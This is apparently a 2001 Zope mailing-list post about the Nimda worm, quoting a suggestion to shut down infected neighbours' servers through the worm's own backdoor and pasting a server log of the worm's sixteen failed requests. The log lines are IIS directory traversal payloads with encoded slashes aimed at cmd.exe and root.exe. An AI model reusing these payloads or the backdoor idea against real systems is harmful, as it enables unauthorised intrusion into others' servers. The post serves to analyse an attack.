[Zope] Zope 1 : NIMDA 0

marc lindahl marc@bowery.com
Fri, 21 Sep 2001 12:01:51 -0400 

> From: reinoud@xs4all.nl (Reinoud van Leeuwen)
>> 
> 
> You can "help" your infected neigbours by remotely turning their
> infected servers off! see
> http://pc.xs4all.nl/default.ida
> 
> (it is a Perl script that uses the same backdoor as the virus itself.
> I've not yet installed perl in Zope, but am working on it ";-)


I'm not seeing a request for that as part of the worm attack.  It does a
pattern of 16 requests, here's the log:

9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:root.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:MSADC:root.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:c:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:d:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%5c..:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:_vti_bin:..%5c..:..%5c..:..%5c..:winnt:system32:cmd.exe    File/folder
not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:_mem_bin:..%5c..:..%5c..:..%5c..:winnt:system32:cmd.exe    File/folder
not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:msadc:..%5c..:..%5c..:..%5c:..%c1%1c..:..%c1%1c..:..%c1%1c..:winnt:syst
em32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%c1%1c..:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%c0%2f..:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%c0%af..:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%c1%9c..:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%5c..:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%5c..:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%5c..:winnt:system32:cmd.exe    File/folder not found
9:14 AM    9/18/01    216.254.35.211    HTTP        get failed
:pub:scripts:..%2f..:winnt:system32:cmd.exe    File/folder not found